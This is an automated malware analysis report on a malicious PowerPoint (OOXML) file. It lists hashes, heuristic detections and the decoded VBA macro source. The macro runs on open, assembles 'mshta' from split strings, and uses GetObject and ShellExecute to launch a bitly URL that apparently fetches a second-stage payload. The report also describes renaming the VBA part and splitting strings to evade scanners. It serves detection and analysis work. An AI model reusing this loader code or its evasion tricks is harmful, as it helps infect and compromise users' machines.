Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 91c3adccf9e8b7de…

MALICIOUS

Office (OOXML)

10.4 KB First seen: 2021-06-13
MD5: 5b8e444cc2753a3701fbacf030dc3121 SHA-1: 774af9cdd89ea4924242737209616056882fc56a SHA-256: 91c3adccf9e8b7de1e5ffb86b25e2a871cb51e99568a1f342135f39568940b75
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.005 System Binary Proxy Execution: Mshta

The sample contains VBA macros with an Auto_Open subroutine that attempts to execute a payload. The script reassembles the string 'mshta' and uses the GetObject function to execute a URL, likely to download and run a second-stage payload. The VBA project part was also renamed to evade detection.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/zaq.bin)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    . _
ShellExecute@ _
NamakBora _
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
GetObject _
(StrReverse _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
AutO_opEn _
()
  • VBA project is signed but not by a recognised publisher info VBA_SIGNED_UNTRUSTED
    The VBA project carries a digital signature, but the signer does not chain to a recognised code-signing publisher/CA (self-signed, unknown issuer, or unparseable). A signature alone is not evidence of benignity — malware is routinely self-signed or signed with stolen certificates.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/asahdjiaiaawn In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1273 bytes
SHA-256: 10cfdeec59a1b8fc7a5aff364b13dec2e2905469efed3ed1dcc66220168ef7cf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub _
AutO_opEn _
()

Dim _
bora _
As _
New _
Class1

Dim _
NamakBora _
, _
lora _
As _
String
NamakBora _
= _
bora _
. _
getEnumName _
(1)
lora _
= _
bora _
. _
getEnumName _
(2)
lora2 _
= _
bora _
. _
getEnumName _
(2)


bora _
. _
myvalue _
. _
ShellExecute@ _
NamakBora _
, _
lora2

End _
Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum

    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
    
    End Enum
    
Public _
Function _
getEnumName _
(eValue As myenum)
Select _
Case _
eValue
    Case _
    1
        getEnumName _
        = _
        "m" + "s" + "h" + "t" + "a"
    Case _
    2
        getEnumName _
        = _
        "https://www.bitly.com/asahdjiaiaawn"
    End _
    Select
End _
Function


Public _
Function _
myvalue _
()
Set _
myvalue _
= _
GetObject _
(StrReverse _
("000045355444-E94A-EC11-972C-02690731:wen") _
)
End _
Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/zaq.bin 18944 bytes
SHA-256: 99a22d9f82db394d6d3d1908449ff9b6f1299bc381490e0b65502e18fe171535
vbaProject_01.bin vba-project OOXML VBA project: ppt/vbaProjectSignature.bin 1928 bytes
SHA-256: 804e986db30fcf186f7da4b6520ca60192c84e08716f7ef53def03a3ec443c8e

Open this report in the interactive analyzer, or submit your own file for analysis.